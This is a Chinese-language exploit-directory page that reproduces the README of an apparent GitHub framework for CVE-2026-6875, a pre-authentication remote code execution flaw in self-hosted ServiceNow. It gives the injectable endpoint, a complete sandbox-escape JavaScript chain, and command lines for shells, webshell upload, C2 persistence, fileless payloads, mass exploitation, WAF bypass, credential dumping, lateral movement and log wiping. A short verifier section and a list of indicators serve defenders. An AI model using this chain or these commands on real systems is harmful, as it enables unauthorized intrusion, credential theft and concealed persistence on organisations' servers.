Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-6875-PoC-Exploit — CVE-2026-6875 ServiceNow 预认证 RCE 框架 🔥 JS 注入 → 沙箱逃逸 → RCE → Root。功能:--detect、--exec、反弹/交互式 shell、批量线程、WAF 绕过、持久化、横向移动、凭据转储、无文件执行、清除痕迹。🛡️ CVSS 9.5 已被积极利用。仅限授权与合法使用。保持合法。🔒 | Kitploit
工具/GitHubGitHub/tc4dy/cve-2026-6875-poc-exploit
权限提升漏洞扫描器持久化机制漏洞利用横向移动Web应用程序漏洞利用后渗透利用WAF绕过渗透测试

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
远程访问工具
GitHubtc4dy/cve-2026-6875-poc-exploit

CVE-2026-6875-PoC-Exploit

CVE-2026-6875 ServiceNow 预认证 RCE 框架 🔥 JS 注入 → 沙箱逃逸 → RCE → Root。功能:--detect、--exec、反弹/交互式 shell、批量线程、WAF 绕过、持久化、横向移动、凭据转储、无文件执行、清除痕迹。🛡️ CVSS 9.5 已被积极利用。仅限授权与合法使用。保持合法。🔒

查看仓库
329天前尚未审核

CVE-2026-6875

CVE-2026-6875 - ServiceNow 预认证 RCE 漏洞利用框架与 PoC 验证器 🔥

CVE-2026-6875 CVSS 9.5 CISA KEV Python 3.6+

Pre-Auth RCE Sandbox Escape Privesc Windows Ready

ServiceNow AI 平台 — JavaScript 注入 → 沙箱逃逸 → RCE → Root 提权

漏洞利用框架与安全验证器
仅供授权安全测试使用。


⚖️ 法律免责声明与负责任使用

本工具仅供教育和授权渗透测试目的使用。

作者和贡献者不对因使用本软件而造成的任何滥用或损害负责。用户须自行确保在测试前已获得目标所有者的明确书面许可。根据《计算机欺诈与滥用法》(CFAA)及全球类似法律,未经授权访问计算机系统属于违法行为。

使用本软件即表示您同意:

  • 仅将其用于您拥有或已获得明确测试许可的系统。
  • 遵守所有适用的地方、州和联邦法律。
  • 不将其用于任何恶意、破坏性或非法活动。

⚠️ 警告: 该漏洞正在被野外积极利用。未经授权的使用可能导致严重的法律后果。


🔥 漏洞概述

CVE-2026-6875 是 ServiceNow AI 平台(原 Now Platform)中的一个严重 未认证远程代码执行(RCE) 漏洞。攻击者可借此绕过脚本沙箱,并以 ServiceNow 应用程序的权限执行任意系统命令。

工作原理:

  1. JavaScript 注入: assessment_thanks.do 端点接受 sysparm_assessable_type 参数。攻击者通过在值前添加 javascript: 前缀来注入任意 JavaScript 代码。

  2. 沙箱逃逸: 一个复杂的沙箱逃逸小工具(链式利用 DiscoveryFunctions.getCacheObjectForTable、AbstractAjaxProcessor 和 Class.create)解除 JavaScript 沙箱限制。

  3. 远程代码执行: 注入的 Java 代码(通过 java.lang.Runtime.exec())以 ServiceNow 应用程序权限运行,从而实现完整的系统入侵。

  4. 权限提升: 利用后模块尝试通过 sudo 错误配置、SUID 二进制文件、可写的 cron 任务或内核漏洞利用提升至 root 权限。

关键事实:


🛠️ 漏洞利用框架(exploit.py)

完整武器化漏洞利用 将 JavaScript 注入与沙箱逃逸链式结合以实现远程代码执行,并配备用于持久化、横向移动和凭据转储的高级利用后模块。

✨ 功能特性

交互式 Shell 命令


🕵️ 安全验证器(verifier.py)

安全验证器 执行非侵入式漏洞检测,既不执行有害载荷,也不更改系统。

✨ 功能特性


📦 安装与要求

前提条件

  • Python 3.6+
  • pip(用于 requests 库)

安装依赖

root@kitploit:~
pip install requests urllib3

[!NOTE] exploit.py 的核心功能仅使用标准库;requests 仅用于 --detect 功能、--webhook 通知和安全验证器。


🚀 使用示例

[1] 安全验证器(verifier.py)

root@kitploit:~
# Single target verification
python verifier.py -u 192.168.1.100

# Custom port and path
python verifier.py -u 10.0.0.5 -p 8443 --path /snow

# Mass scan from file
python verifier.py -l targets.txt -o results.json

# Quiet mode (only vulnerable targets)
python verifier.py -u 192.168.1.100 -q

# Increase timeout for slow targets
python verifier.py -u servicenow.example.com --timeout 60

# Custom User-Agent
python verifier.py -u 192.168.1.100 --user-agent "MyScanner/1.0"

[2] 漏洞利用框架(exploit.py)

root@kitploit:~
# Interactive shell on target
python exploit.py -u 192.168.1.100

# Execute a single command
python exploit.py -u 192.168.1.100 --exec "id && whoami"

# Read a file
python exploit.py -u 192.168.1.100 --read-file /etc/passwd

# Enable detection before exploitation
python exploit.py -u 192.168.1.100 --detect

# Attempt root privilege escalation
python exploit.py -u 192.168.1.100 --privesc

# Upload a webshell
python exploit.py -u 192.168.1.100 --upload shell.jsp

# Install persistence with C2
python exploit.py -u 192.168.1.100 --persistence --c2-host 10.0.0.5 --c2-port 4444

# Clean tracks after exploit
python exploit.py -u 192.168.1.100 --clean

# Use fileless (memory) payload
python exploit.py -u 192.168.1.100 --fileless --c2-host 10.0.0.5 --c2-port 4444

# Mass exploit from file (50 threads)
python exploit.py -l targets.txt -m 50 --exec "uname -a"

# Custom callback server port
python exploit.py -u 192.168.1.100 --callback-port 9090

# Enable WAF bypass techniques
python exploit.py -u 192.168.1.100 --waf-bypass

# Send notifications via webhook
python exploit.py -u 192.168.1.100 --webhook https://myhook.com/snow

# Pipe mode (read command from stdin)
echo "cat /etc/hosts" | python exploit.py -u 192.168.1.100

# Custom port and path
python exploit.py -u 10.0.0.5 -p 8443 --path /snow

# Disable TLS verification (for self-signed certs)
python exploit.py -u 192.168.1.100 --insecure-tls

# Custom timeout and retries
python exploit.py -u 192.168.1.100 -t 60 -r 5 -d 2.0

🎯 受影响版本

⚠️ 重要提示: ServiceNow Cloud 实例会自动修补。此漏洞主要影响 自托管 部署。


🧠 技术深度剖析

1. JavaScript 注入(CVE-2026-6875)

该漏洞位于 assessment_thanks.do 端点中,该端点接受 sysparm_assessable_type 参数。通过提供以 javascript: 开头的值,平台会在系统上下文中执行后续的 JavaScript。

易受攻击的端点:

POST /assessment_thanks.do sysparm_assessable_type=javascript:gs.print('test')

2. 沙箱逃逸小工具

注入的代码最初被限制在沙箱中。然而,通过利用以下链:

root@kitploit:~
javascript:
var s="<payload>";
DiscoveryFunctions.getCacheObjectForTable=Object;
var a={};a.get=Object;
var b=new AbstractAjaxProcessor();
b.initialize=DiscoveryFunctions.getFirstValueFromTable(
  a,"",DiscoveryFunctions.getFirstValueFromTable(
    a,"",DiscoveryFunctions.getFirstValueFromTable(
      a,"",global,"WorkflowIconsSCR",""),"prototype",""),"initialize","");
b.a=Class.create();b.a(s);

沙箱被绕过,从而获得对 java.lang.Runtime 等 Java 类的完全访问权限。

3. 利用后模块

凭据转储

搜索 .properties、.xml、.conf 文件中的密码、API 密钥和机密信息:

  • /opt/ServiceNow/conf/*.xml
  • /var/log/ServiceNow/*.log
  • /etc/passwd、/etc/shadow

持久化

通过以下方式安装后门:

  • Linux: Cron 任务(*/5 * * * *)、systemd 服务、SSH 密钥
  • Windows: 计划任务(schtasks)、注册表运行键

横向移动

扫描本地子网中的其他 ServiceNow 实例或 SSH 主机,并复用以发现的凭据。

无文件执行

即时编译 Java 类,通过 ClassLoader 加载并在内存中执行(不写入磁盘)。

WAF 绕过技术

  1. 双重 URL 编码
  2. JavaScript 注释({/*comment*/})
  3. Unicode 转义(\u0077 表示 w)
  4. 空白字符注入
  5. 关键字拆分(ne\u0077 表示 new)
  6. 随机技术选择

🔍 入侵指标(IoCs)

日志分析

在您的 ServiceNow 日志中搜索:

  • extraweb_access.log – 对 /assessment_thanks.do 的请求,其中 sysparm_assessable_type 包含:
    • javascript:
    • Base64 编码的字符串
    • DiscoveryFunctions.getCacheObjectForTable
    • AbstractAjaxProcessor

文件系统

  • /var/tmp/ 中的意外文件(例如 shell.jsp、.sh 脚本)
  • 被修改的 /etc/passwd、/etc/shadow 或 ~/.ssh/authorized_keys
  • 新增的 cron 任务(crontab -l)
  • 新增的 systemd 服务(/etc/systemd/system/)

进程

  • 可疑进程(/bin/bash -i、nc、curl、wget、python -c)
  • 与外部 IP 的意外网络连接

网络

  • 从 ServiceNow 服务器到未授权 IP 的出站连接
  • 非常规端口上的反向 Shell 连接

📚 参考资料

  • NVD - CVE-2026-6875
  • ServiceNow Security Advisory (KB3137947)
  • CISA KEV 目录
  • Searchlight Cyber – 技术分析
  • The Hacker News – ServiceNow 零日漏洞被利用

🔗 其他漏洞利用

[+] CVE-2026-15409/15410 - SonicWall SMA1000 多漏洞利用框架
https://github.com/tc4dy/CVE-2026-15409-15410-Framework

[+] CVE-2026-41091 - SolarFlare (RedSun) Microsoft Defender 本地权限提升
https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit

[+] CVE-2026-57821 - Apache Fineract SQL 注入工具包
https://github.com/tc4dy/CVE-2026-57821-PoC-Exploit

[+] CVE-2026-41940 - cPanel/WHM 认证绕过
https://github.com/tc4dy/CVE-2026-41940-PoC-Exploit

下载工具
属性值
📅 发现时间2026 年 4 月 1 日(Searchlight Cyber)
⚠️ CVSS 评分9.5(严重)
📋 CISA KEV2026 年 7 月 13 日添加
🎯 受影响产品自托管 ServiceNow AI 平台
🔄 修复版本Brazil EA/GA、Australia Patch 2、Zurich Patch 7b/9、Yokohama Patch 12 Hot Fix 1b/13
🔓 认证要求无需认证(预认证)
🌍 活跃利用已在野外确认(2026 年 7 月)
功能描述
🚀 JavaScript 注入通过 sysparm_assessable_type 参数注入载荷。
💻 沙箱逃逸绕过 ServiceNow 脚本沙箱以运行任意 Java 代码。
🔐 交互式 Shell生成实时 shell,支持多条命令。
👑 Root 提权检查 sudo 错误配置、SUID 二进制文件和 cron 任务。
📁 文件操作上传 WebShell,通过 base64 编码读取/下载文件。
🌐 批量扫描使用多线程批量利用多个目标(-l 参数)。
🎯 安全检测可选的 --detect 参数,用于非侵入式漏洞验证。
⚙️ WAF 绕过内置混淆技术以绕过 WAF/IDS(6 种技术)。
🧩 持久化安装 cron/systemd/schtasks 后门。
🔍 横向移动扫描本地网络中的其他易受攻击主机,并尝试通过 SSH/SSRF 传播。
🧹 痕迹清理删除日志、bash 历史记录和审计痕迹。
💾 无文件执行使用 Java ClassLoader 在内存中运行载荷,无需写入磁盘。
🔌 回调服务器内置 HTTP 服务器,用于接收命令输出(可选)。
📢 Webhook 通知将结果发送到自定义 URL(Slack、Discord 等)。
🪟 跨平台支持 Linux 和 Windows 目标(cmd.exe / PowerShell)。
🔒 线程安全使用锁机制实现并发操作安全。
📊 版本检测检测 ServiceNow 版本(Zurich/Brazil/Australia/Yokohama)。
命令描述
exec <cmd>执行系统命令
upload <local> [remote]将 WebShell 上传到目标
download <remote>下载并显示文件内容
privesc尝试权限提升
reverse <host> <port>发送反向 Shell
dumpcred从 ServiceNow 配置中转储凭据
persist <host> <port>安装持久化(cron/systemd/schtasks)
lateral尝试横向移动
clean清理痕迹(日志、历史记录)
memory <host> <port>执行无文件 Java 载荷
exit退出交互式 Shell
功能描述
🔍 ServiceNow 检测通过多个端点识别 ServiceNow 实例。
📊 版本检测检测具体的 ServiceNow 版本和补丁级别。
🧪 JavaScript 注入测试使用安全的 gs.print() 载荷测试注入漏洞。
🔒 沙箱逃逸测试在不执行破坏性命令的情况下验证沙箱逃逸。
📈 置信度评分基于证据提供置信度百分比(85‑95%)。
📋 JSON 输出将结果导出为 JSON 格式以便报告。
🔄 批量扫描支持多线程扫描多个目标。
🎯 非侵入式仅执行无害的 uname -a 获取系统信息。
ServiceNow 版本受影响版本修复版本
BrazilEA、GA已修补(GA 之后)
AustraliaPatch 2 之前Patch 2+
ZurichPatch 7b、Patch 9 之前Patch 7b、Patch 9+
YokohamaPatch 12 Hot Fix 1b 之前Patch 12 Hot Fix 1b、Patch 13
其他版本未知请查看官方公告